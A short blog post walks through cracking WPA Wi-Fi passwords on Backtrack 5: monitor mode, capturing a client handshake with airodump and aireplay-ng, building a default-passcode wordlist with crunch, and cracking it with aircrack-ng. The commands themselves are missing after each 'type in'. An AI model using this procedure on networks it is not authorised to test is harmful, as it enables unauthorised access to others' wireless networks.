6:23 PM
Unknown
1.Load up Backtrack (I was using Backtrack 5 R2)
2.Open up terminal
Type in:
What that will do is put your device in monitor mode on "mon0" (which will now become your new interface name)
3. In the terminal windows type in:
Now in order to get a handshake file (what we will be cracking) You need to have a client that is connected to the access point you want to attack. airodump will let you know this.
4. Copy down the AP Mac, the Client Mac, and the channel number
After you've copied that you can close the other windows.
5. In a new terminal windows type in:
You can now use aireplay-ng to get the capture file, here's how we do it:
After you do that, airodump should now say you have the handshake. That's it, you're done with getting the handshake, now its time for the long part, cracking the handshake.
Your time will depend on your computer and your wordlist. In this example I was attacking a 2WIREXXX network that in most cases uses a default 10 digit passcode. You can run this command to create a wordlist file for you in backtrack (for that specific wordlist)
IF YOU RUN THAT CRUNCH COMMAND, BE PREPARED ITS A 35.7GB FILE!
After that, its your choice with what you want to do. You can either continue cracking it on backtrack, you can use pyrit, aircrack-ng, cowpatty, etc. You can even use windows with an application like elcomsoft wireless security auditor. for aircrack-ng run the following command:
Just a quick run through.Its easy,but its the cracking that will take a while.Hope they have WPS, if they do, that becomes much easier ;) There are also several wordlists available.You can use whatever wordlist you want.Also as long as you have the capture file, you can crack it on any system.You'll want a system with alot of processing power, ram, and a supported graphics card to get upwards of 1500+ k/s (keys per second) [for example my laptop is averaging 300k/s total crap and will never finish]
Enjoy WPA cracking!
Posts
0 comments:
Post a Comment